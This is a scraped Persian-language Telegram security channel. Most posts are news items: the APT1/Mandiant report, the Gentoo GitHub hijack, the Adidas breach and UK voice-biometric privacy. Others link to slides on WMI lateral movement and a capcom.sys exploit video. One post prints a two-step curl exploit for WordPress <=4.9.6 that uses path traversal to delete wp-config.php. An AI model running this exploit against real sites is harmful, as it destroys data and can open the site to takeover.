امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
گزارش شرکت امنیتی Mandiant در خصوص ارتباط گروه هکرهای چینی با کد APT1 که جزییات جالبی از نحوه شناسایی و فعالیتهای این گروه دارد:

شرکت Mandiant به دنبال شواهدی بود که نشان دهد APT1 ارتباط نزدیکی با ارتش آزادی بخش مردم چین (بصورت خلاصه PLA) دارد. mandia مطمئن بود که این هکرها زیرمجموعه واحد 61398 ارتش چین هستند و میدانست که متهم کردن ارتش چین در این عملیات، قدم بزرگی برای شرکتش به حساب می آید. آنها شواهد زیادی از شرکتهای هک شده و شواهد حضور هکرهای apt1 جمع آوری کرده بودند اما هیچ کدام از افراد این شرکت نمیتوانستند بصورت حضوری در واحدهای مشکوک کشور چین حضور یابند،‌چه بصورت فیزیکی و چه مجازی، زیرا ارتش چین آنها را از این کار منع میکرد.
در نهایت پس از تلاشهای فراوان کارشناسان mandiant توانستند با آلوده کردن لپ تاپ های هکرهای چینی، دوربین های این لپ تاپها را فعال کنند!
آنها میتوانستند تایپ کردن آنها را پشت میزهای کارشان ببینند.
تمام این هکرها مرد بودند، نزدیک ۲۵ سال سن داشتند، ساعت ۸ و نیم صبح به وقت شانگهای وارد محل کار میشدند، نتایج وزرشی را بررسی میکردند، به دوست دخترهای خود ایمیل میزدند و گاهی پورن تماشا میکردند!
ساعت ۹ حملات خود را به سیستم های مختلف در اقصی نقاط جهان آغاز میکردند و این کار تا زمان ناهار ادامه داشت. زمان استراحت بعد از ناهار هم اختصاص به کارهای صبح مانند ایمیل و پورن و ... داشت.
بر خلاف تصور نویسنده،‌این هکرها لباسهای نظامی و آرم و علائم نداشتند بلکه با ژاکت های چرم و گاهی عرقگیر کار میکردند و مشخص نیست که آنها با سفارش دولت یا شرکتها اقدام به هک میکردند یا نه!


تصاویر مربوط به این مطالب را در پست بعدی خواهید دید.
کتاب کامل این گزارش نیز از آمازون قابل تهیه است:
https://www.amazon.com/Perfect-Weapon-Sabotage-Fear-Cyber/dp/0451497899



#apt1
#news
#china


@sec_nerd
بکارگیری پاورشل توسط تیم های امنیتی با هدف مدیریت و مانیتورینگ رخدادها در ویندوز‌ (قسمت اول)

https://blog.varonis.com/practical-powershell-for-it-security-part-i-file-event-monitoring/


#windows
#ps
#security


@sec_nerd
ادامه دهنده عزیز
وقتی این کد رو مینوشتم،فقط من و خدا میدونستیم چیه.حالا فقط خدا میدونه!
اگر بهینه سازیت روی کد تموم شده(و شکست خوردی) برای هشدار دادن به نفر بعدی،عدد زیر رو زیاد کن

ساعتهای تلف شده:۶۷
بر اساس گزارش شرکت Big Brother Watch که یک شرکت طرفدار حفظ حریم خصوصی و آزادی های مدنی در بریتانیاست، سیستم صوتی درآمد و گمرکات ملکه صداهای بیش از 5.1 میلیون شهروند بریتانیا را بدون اطلاع آنها ضبط کرده است.
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.


منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/


#news
#britania
#privacy
#england


@sec_nerd
این میزان از شهامت در سال ۲۰۱۸ ستودنیه!

#windows
#smb
#win98
#eternalblue

@sec_nerd
wmi_slides.pdf
15.9 MB
حرکات جانبی در شبکه با استفاده از WMI

#windows
#network
#privesc
#lateral_movement


@sec_nerd
قابل توجه کاربران سیستم عامل Gentoo

روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.


منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html

#news
#linux
#github
#gentoo
#malware


@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!

# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :

Step 1:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



#wordpress
#wp
#exploit
#web
#pentest

@sec_nerd
لیست ۵۰۰ سوپر کامپیوتر جهان منتشر شد و رتبه اول قوی ترین سوپر کامپیوتر به IBM Summit از امریکا اختصاص یافت.
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)

منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/


#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna


@sec_nerd
Media is too big
VIEW IN TELEGRAM
reverse engineering the "feature" provided by the capcom.sys driver on #Windows using Binary Ninja and Windbg.with a working exploit written in C

@sec_nerd
پس از اعلام شرکت آدیداس مبنی بر هک شدن وبسایت نمایندگی امریکای این شرکت، جزییاتی در خصوص اطلاعات به سرقت رفته منتشر شده است.
این اطلاعات شامل نام های کاربری و مشخصات میلیونها کاربر آدیداس بوده است.
اما آدیداس معتقد است که اطلاعات مربوط به سلامت و حسابهای بانکی مشتریان در این حمله دزدیده نشده، بعلاوه پسوردهای هک شده همگی دارای رمزنگاری مناسب بوده اند که این نشان از آمادگی مناسب آدیداس در برابر حملات این چنینی دارد.
اما آمادگی در برابر حمله هایی در این شکل و شمایل کافی نیست و نیاز به کار مداوم و بروزرسانی های امنیتی دائمی دارد.

هنوز جزییات دقیق تری از سوی آدیداس درخصوص این حمله منتشر نشده است.


منبع:
https://www.hackread.com/hackers-steal-millions-of-customers-data-from-adidas-us-website/


#adidas
#breach
#news


@sec_nerd